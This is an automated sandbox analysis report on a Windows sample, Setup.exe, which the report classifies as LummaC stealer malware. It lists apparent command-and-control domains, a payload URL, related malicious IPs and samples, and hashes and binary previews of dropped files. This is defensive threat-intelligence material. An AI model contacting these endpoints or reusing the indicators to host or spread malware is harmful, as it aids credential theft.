https://support.mozilla.org/products/firefoxgro.all | Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://kliptizq.shop/Z | Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://quantitypitt.click:443/apiK | Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://quantitypitt.click/ | Designing.com, 0000000C.00000003.2535367064.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2558937419.00000000041DE000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://www.cloudflare.com/learning/access-management/phishing-atX) | powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | false | high
https://quantitypitt.click:443/apiicrosoft | Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://neqi.shop/ | Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.autoitscript.com/autoit3/X | Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000000.2130438108.0000000000E75000.00000002.00000001.01000000.00000006.sdmp, Designing.com.2.dr, Brunette.9.dr | false | high
http://ocsp.rootca1.amazontrust.com0: | Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://nsis.sf.net/NSIS_ErrorError | Setup.exe | false | high
https://quantitypitt.click/apik | Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://www.ecosia.org/newtab/ | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://kliptizq.shop/9 | Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank | powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp | false | high
https://ac.ecosia.org/autocomplete?q= | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://neqi.shop/sdgjyut/psh.txtk | Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Setup.exe | false | high
https://quantitypitt.click/% | Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.cloudflare.com/5xx-error-landingmance | powershell.exe, 00000010.00000002.2796376802.0000000000980000.00000004.00000020.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.186.189 | quantitypitt.click | United States | 13335 | CLOUDFLARENETUS | true
172.67.191.144 | kliptizq.shop | United States | 13335 | CLOUDFLARENETUS | false
194.58.112.174 | neqi.shop | Russian Federation | 197695 | AS-REGRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579539
Start date and time: 2024-12-22 23:27:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:Setup.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@27/26@4/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 77
                                                                                                                                                  • Number of non-executed functions: 304
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4676 because it is empty
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:28:07 | API Interceptor | 1x Sleep call for process: Setup.exe modified
17:28:44 | API Interceptor | 10x Sleep call for process: Designing.com modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.191.144 | setup.exe | malicious | LummaC
 | 'Setup.exe | malicious | LummaC Stealer
 | update_1630227239.dll | malicious | IcedID
194.58.112.174 | SWIFT COPY.exe | malicious | FormBook
  • www.elinor.club/1ne4/
 | Nieuwebestellingen10122024.exe | malicious | FormBook
  • www.synd.fun/6sgf/
 | SRT68.exe | malicious | FormBook
  • www.fantastica.digital/5srj/
 | 72STaC6BmljfbIQ.exe | malicious | FormBook
  • www.elinor.club/1ne4/
 | specification and drawing.exe | malicious | FormBook, PureLog Stealer
  • www.synd.fun/6sgf/
 | Pre Alert PO TVKJEANSA00967.bat.exe | malicious | FormBook, PureLog Stealer
  • www.elinor.club/7plr/
 | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook
  • www.sklad-iq.online/gdvz/
 | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook
  • www.sklad-iq.online/gdvz/
 | Item-RQF-9456786.exe | malicious | Unknown
  • www.sklad-iq.online/j4lg/
 | PO AT-5228.exe | malicious | FormBook
  • www.marketplacer.top/xprp/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
kliptizq.shop | setup.exe | malicious | LummaC
  • 104.21.84.113
 | Setup.exe | malicious | LummaC
  • 104.21.84.113
 | setup.exe | malicious | LummaC
  • 172.67.191.144
 | Set-up.exe | malicious | LummaC Stealer
  • 104.21.84.113
 | 'Setup.exe | malicious | LummaC Stealer
  • 172.67.191.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | loligang.sh4.elf | malicious | Mirai
  • 162.158.254.178
 | winwidgetshp.mp4.hta | malicious | LummaC
  • 104.21.18.182
 | https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/ | malicious | HTMLPhisher
  • 104.21.234.144
 | nshkppc.elf | malicious | Mirai
  • 104.24.135.181
 | swift-bootstrapper.exe | malicious | Unknown
  • 104.18.38.10
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
  • 104.21.67.146
 | 7394231845.html | malicious | Unknown
  • 104.17.25.14
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 104.21.67.146
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 104.21.63.229
AS-REGRU | SWIFT COPY.exe | malicious | FormBook
  • 194.58.112.174
 | arm.nn.elf | malicious | Mirai, Okiru
  • 194.58.59.91
 | Nieuwebestellingen10122024.exe | malicious | FormBook
  • 194.58.112.174
 | hax.ppc.elf | malicious | Mirai
  • 194.58.94.235
 | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | malicious | FormBook
  • 31.31.198.145
 | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
  • 194.87.189.43
 | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
  • 194.87.189.43
 | cXjy5Y6dXX.exe | malicious | RHADAMANTHYS
  • 193.124.205.63
 | SRT68.exe | malicious | FormBook
  • 194.58.112.174
 | New Order.exe | malicious | FormBook
  • 31.31.196.17
CLOUDFLARENETUS | loligang.sh4.elf | malicious | Mirai
  • 162.158.254.178
 | winwidgetshp.mp4.hta | malicious | LummaC
  • 104.21.18.182
 | https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/ | malicious | HTMLPhisher
  • 104.21.234.144
 | nshkppc.elf | malicious | Mirai
  • 104.24.135.181
 | swift-bootstrapper.exe | malicious | Unknown
  • 104.18.38.10
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
  • 104.21.67.146
 | 7394231845.html | malicious | Unknown
  • 104.17.25.14
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 104.21.67.146
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 104.21.63.229
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | winwidgetshp.mp4.hta | malicious | LummaC
  • 172.67.191.144
  • 172.67.186.189
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
  • 172.67.191.144
  • 172.67.186.189
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 172.67.191.144
  • 172.67.186.189
 | Solara-3.0.exe | malicious | LummaC
  • 172.67.191.144
  • 172.67.186.189
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig
  • 172.67.191.144
  • 172.67.186.189
 | Rechnung736258.pdf.lnk | malicious | LummaC
  • 172.67.191.144
  • 172.67.186.189
 | Navan - Itinerary.pdf.scr.exe | malicious | LummaC
  • 172.67.191.144
  • 172.67.186.189
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\124531\Designing.com | GoldenContinent.exe | malicious | Vidar
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
 | Full-Setup.exe | malicious | LummaC
 | Setup.exe | malicious | LummaC
 | Setup.exe | malicious | LummaC Stealer
 | Full-Setup.exe | malicious | LummaC Stealer
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Vidar, Xmrig
 | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.7307872139132228
Encrypted: false
SSDEEP: 3:NlllulF/lll:NllUF/ll
MD5: 3ECB05F56210644B241FF459B861D309
SHA1: 1A33420F5866C42A5ED3CFF0DD505451FBFA8072
SHA-256: 712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
SHA-512: 79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:@...e.................................^.........................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):947288
                                                                                                                                                                            Entropy (8bit):6.630612696399572
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: GoldenContinent.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):485033
                                                                                                                                                                            Entropy (8bit):7.999622677241369
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:12288:T0n+LzgC7Jg8hj2FYbn2NJodMF32iOI+8pRPPZ8aE+gmemXk:T0n+LznhyMn2odO3aIJ7PPZDkpl
                                                                                                                                                                            MD5:C8BCC7EFC9A0A945F8FEB4A3CA93A5C8
                                                                                                                                                                            SHA1:1A528FA9039A63FD26DEE3AABBFFBE04E3A48AFF
                                                                                                                                                                            SHA-256:4FD550298E4381871ADD39034076FB4807D2943248748E241662E1410CD6A79E
                                                                                                                                                                            SHA-512:CB8D6C820FEC4B048CDCE893F3FC0C4EDE2C17A4709CED46DD2713399C9C558DA0E9C814B6BAC090537CE5148C2132634D9A4C94C0ED314B8B5444F0F3DEACD8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                            Entropy (8bit):6.472997374549826
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Ep7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+x:syA3laW2UDQWf05mjccBiqXv0
                                                                                                                                                                            MD5:18C1428A7B79988F9681AA014C1650E2
                                                                                                                                                                            SHA1:A6FA9EC2F84EE0F4AE4FE5A8952C05582BF5FC3A
                                                                                                                                                                            SHA-256:9E8642A3207321BF3381D18A556195BB365AE96BD307C4579D7778DA014F60DD
                                                                                                                                                                            SHA-512:8C3D70C023E5EDE9CBE455A65814EFE7FDA87901F305D5102AD73AC819A2AEA18BB6E00A7FD45369DA83BC421DDDAE20C433B9BB48998B5C26E4A931B8D51F91
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:Atari 68xxx CPX file (version 0064)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):59392
                                                                                                                                                                            Entropy (8bit):3.694569408389299
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:+GfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8q:3AsAhxjgarB/5el3EYr
                                                                                                                                                                            MD5:CC7ECE8744674A7D06C60C3E6BF4BB2F
                                                                                                                                                                            SHA1:39E89ADE98B9A8B66DD0D50E68EB7DCF27978AEF
                                                                                                                                                                            SHA-256:B678E8A5B74AE89AF6B3207DCAFDC9C39002044ECCBD50F730592819F7621ED6
                                                                                                                                                                            SHA-512:061975D724EDA1DF409EC2C85E976C470832D1A6AE33B4AF9876F37853BB92195853468EE6C9D3DEBF2EF6B4F6F124D221AEA4A3DE39D7A62C3F32A154754BD2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80896
                                                                                                                                                                            Entropy (8bit):7.997659747996092
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:L5JwicSfMIRB2Nhgaxv9X9pqvU9PBKgUVkz8D4E7h/YXiH:LMicSeNh37pquogUQk97h/YSH
                                                                                                                                                                            MD5:37D0F95BFF0FCAC89CB31BA38C3A05F4
                                                                                                                                                                            SHA1:81BE735684D279B24790B9CC5ABA209D1765CD8C
                                                                                                                                                                            SHA-256:3B860E4A353F970E51AB4DCEA648EA93CA0D65C4D543B3294C67AB1AD239F7F9
                                                                                                                                                                            SHA-512:5CB6FF4CC1A991F1E1CCD1BE8A6CE88197DE9D4A00AA0FB177721D1F703E994CAE41085526A2C24C18D5000BFAB266424D91A1B32299A0830C6E8B05D4827688
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):105472
                                                                                                                                                                            Entropy (8bit):6.669790819534835
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:I/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdnV:IgF4qv+32eOyKODOSpQSAU4CE0ImbV
                                                                                                                                                                            MD5:A4CD52A0BD026D306252337DAF23EADC
                                                                                                                                                                            SHA1:CBA1B2603F906AE27A49EA29854A229377C3A791
                                                                                                                                                                            SHA-256:5546AF727D9CE89C765D6BA401E2CB5226BFCEE6F2E61C4A4DB2DB2C61C761B5
                                                                                                                                                                            SHA-512:66E8FD2089F6BD78E56D4F72798FB46CB8258A0FC9DFE1BAA3983C6A79FBB06B166419E1D299A776FEBF1793C4ECDF835BEE70F2806F2A610821697A8012FCE4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):75521
                                                                                                                                                                            Entropy (8bit):7.11227339350969
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:9Wyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:9Wy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                            MD5:C79EA67911B41DA1C3C9DAA720CA69F7
                                                                                                                                                                            SHA1:3851E7A518B7910D153BCE8D6C9BA681B7DFD4A2
                                                                                                                                                                            SHA-256:A5DC5C696272E784BEDEC05C4FE59FD6EA134EA4010225802CAB9416D016A1D7
                                                                                                                                                                            SHA-512:77C3EB26280368787B32D450EA85D3B25F2B8C4DAF45CF81ACD4883C6116D2C4CE6A43A605BE6B33452A1C8A1B1A95EC96EC125758FF5A473BF496323CE12915
                                                                                                                                                                            Malicious:false

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 87040
Entropy (8bit): 6.4250106136589515
Encrypted: false
SSDEEP: 1536:Q1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdZM:QZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/w
MD5: 75A7D116D2BC4524195A666614779937
SHA1: 0E3031B1DC1B7740D0A546B6B2D323D311F7CE60
SHA-256: 722CA9F3CACA0560B1B119CD4F3404F18E40661F38D8D06E6C7168FACD7BE1F2
SHA-512: D0E9F41ED0B4C3277A18A06B226B4A3EA37D1C1241E7E9CEF06C7D9FBBFA35BECFEA4E28282D4CBC327AC2E75DF23035BB3258A2599E133ACA053485FE19B378
Malicious: false
Preview: .I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.

Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 51200
Entropy (8bit): 7.995783687451405
Encrypted: true
SSDEEP: 768:mup2K8kIP7ZURd2kXG9GRZwJ2xbkGM73VQAl5neZ3c+hyUo6K8GTC:EKIORANER+hb73V1zV+Il6Kq
MD5: 2E5AE9F02370714048CC3D0DF2493C1D
SHA1: 03CA65386B757DB9789104F1C1A38FA5986DDD42
SHA-256: 418A8C8C10257B49A891E07332C5C0B2AE92FD2A2ED97EEFB9BD2A40F0FA6359
SHA-512: D6B4D4357A186AB3C0B0017A144C54C2E132BFD3FDAA53C29CA623D5301B5763C46E6420659E973C4C8E3BB28A8EF60AA6AE44AFB809A2EF1AF1335CD6332F70
Malicious: false
Preview: ... .{.;...c,6....+G.N-.....b.-....&..-<F.._.. ..T.\!Ug.T<.=..VN#d..f..eOE...+......<.X.-..vv.>rao.L...o0a.S.83...r.#b}8.;..{se...2.U..;.......j.&...v..yOn..J...K..d....`G.q..+pK.v.~...?KB.[..W.4..L .G..L.....Q.hp...z49..^l..s.8D...v..S.lb%..m8.T. ....z....7."e%t..]c.w%Y^`$..(.kP.=tf..E..D.U,......x(...S.........W..V.....A...G....m.h=.5A.......i......._q..{.=~9.],N.......tX]....*p.tR..8.......0..E...Ds....).r.....j...G)...+...L ..Zq....Sz..o.X...!.>...{..&E..v..T......R..8.l@..../.1.L.a.T......R.!]..cc......2...6.>.A.S...$...jY..j.a..>.....Q.....z.(.;B.+.Z.K...I...~.&6-@...h....u....~.N.g.zt,..uMCK.)...h.g8B..K.ft..^..;.F..'..D....G$.$..O.....3.....H.,....B.'....|L.....yI.nC.....T....<...C/...Ei....]......{.i..H.....z...~..f.M.j......l....%o4H..&N........3.J...,...n).Qh........K(^9u.. @Y@.w.i._.-UO...E.:..Q....dJ......W.J.....+.J.vj.......x^..b.........j....2.....z.M....S.e`.-;.k.... '..."9...7GB.....*mt$#)q.Z.e.=.Z.*..T........[mcH.!.A

Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 84992
Entropy (8bit): 7.997877320808271
Encrypted: true
SSDEEP: 1536:kAR+HcpQiVMIPYOVXFLkqJ51gns5uF4RJRKr1mCJeRElZRYp4oePYFtuRkymn7UH:5+HcpJVDYKSY51PEFIRKhJJfRYpGYFzs
MD5: F861A473D9C0CD1B5AC03CB2E0CBAF83
SHA1: 50A03E8AC65BE216F11C20F87899FB6B3CB70A53
SHA-256: 92A3EE9B920652298DEA3C83F956CFB35E5FE091F0DD50359B418B7DA62CED33
SHA-512: EDA1272AE29CBD7A1B9786DA0A0D3678CE8CA8E615DB09F9A3ACB48902272CEF1EC155E39828BB1C921A74BF7A2C5159C1B4C906867C08437EBB6DE99104A9B4
Malicious: false
Preview: ;w:.....S...`D.l..mK.1V..r.).$.'C.}."..]/9...!...4{C<$.Q...Y.........|,<...2.*PY.2{..[X.......KX.W.y...K....`...'....x..n.KoC..........F.i....c<...X.....@'..=./...}..r..(....p.h7...f....._W...UJ.u..H.....;7. mdj...G...&n.\.0a.....Y\.{F........8....y.V.=.......r.o.W[sd..."...0w:Mc...X9.<......-..n....-[...NH.W..%..?.9......>.....%.....,...ny@DK....q...1......u*Izy........2...9......H.5qt(...oB..R.:c........t<...QX.^@....X@...Z.Mo.....g.g...l...?7L$.b....DI....{.H..I.F..0|.^9...J.(..2:X.+.'.j...VX...WnZ..;B./...w..#....E.?...h..;......s..S.c......2w......l.k....@....^.....ri].j.(.J.!@...Z...[.B....U?QV....F..Pa..dqT.=A1.O...#=.........O....\....u..=.h.#Vz....?..dmB.,...e.......N....)..g.N......=...$u...i.g...-Z...w=..wD.\j....2.6.$,.../.z&.y.).9.<..<..%.8..h..u8.]...I......G(]......-.....=.....Tt......c....;..(A..vk......c.1..3......"6.OC.....-...........Q.1Lj8..zE1.@.....r..........#.9.1'..f.......\..._}h.g) _@......R.....7...@.

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 135168
Entropy (8bit): 6.5681523778956254
Encrypted: false
SSDEEP: 3072:3CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640eJ:3CThp6vmVnjphfhnvO5bLezWWt/Dd31w
MD5: E6231FB7C4AD9D106B7038F0E5FF5DD8
SHA1: B553DBFA3984CF00AB481A8B6F27AB388B2A6EED
SHA-256: EF85FCB11A7A6965E0F0D6BD2C4A59DB13EC4CB632FDBC94E01EFA89B4108F88
SHA-512: 7FB2CCC8FF8800732EFADCCEF2B6F1A4600020F66973E521F555A9A55396C81122E15E59B037B95EEA76F0AFDEFB46CE04E4A0D2A3EFD24EA32624D070F37CBC
Malicious: false
Preview: P..D$$P..D$&P..D$&P..D$(P..$....h4{L.P......$.6..D$.P..D$.P..D$ P..D$"P..D$"P..D$$P.D$|hDzL.P..... .M..D$dP.9........M..;....\$........Qj.V......L$..D$pQhl{L.P.n.......D$d.L$TP..=..P.L$$. ...j.j..D$(PV.5.......L$ .ip...L$T.XG....D$..t{L.P.D$hWP.........D$d.L$TP..<..P.L$$.....j.j..D$(PV.........L$ ..p...L$T..G....D$.P.D$hWP........D$d.L$TP.r<..P.L$$.{...j.j..D$(PV........L$ ..o...L$T.F....D$.P.D$hWP.y.......D$d.L$TP."<..P.L$$.+...j.j..D$(PV.@.......L$ .to...L$T.cF....D$.P.D$hWP.).......D$d.L$TP..;..P.L$$.....j.j..D$(PV.........L$ .$o...L$T..F....D$.P.D$hWP........D$d.L$TP.;..P.L$$....j.j..D$(PV........L$ ..n...L$T..E............D$.P.D$hh.{L.P.}.......D$d.L$TP.&;..P.L$$./...j.j..D$(PV.D.......L$ .xn...L$T.gE...9.M.h..I.........@..|....L..t..I8.A......|....L..t..I8.A.._^3.[..]...U..E........x..SVW..u..0.I....@..p.........F....E..@..0........F.......S....k..Y<.u..M.......P.(....Ph0.I.S....Y....xL.Yt....I..M.P........H..|9...D9.t..@8.@......|9...D9.t..@8.@.._^3.[....U......

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 1373
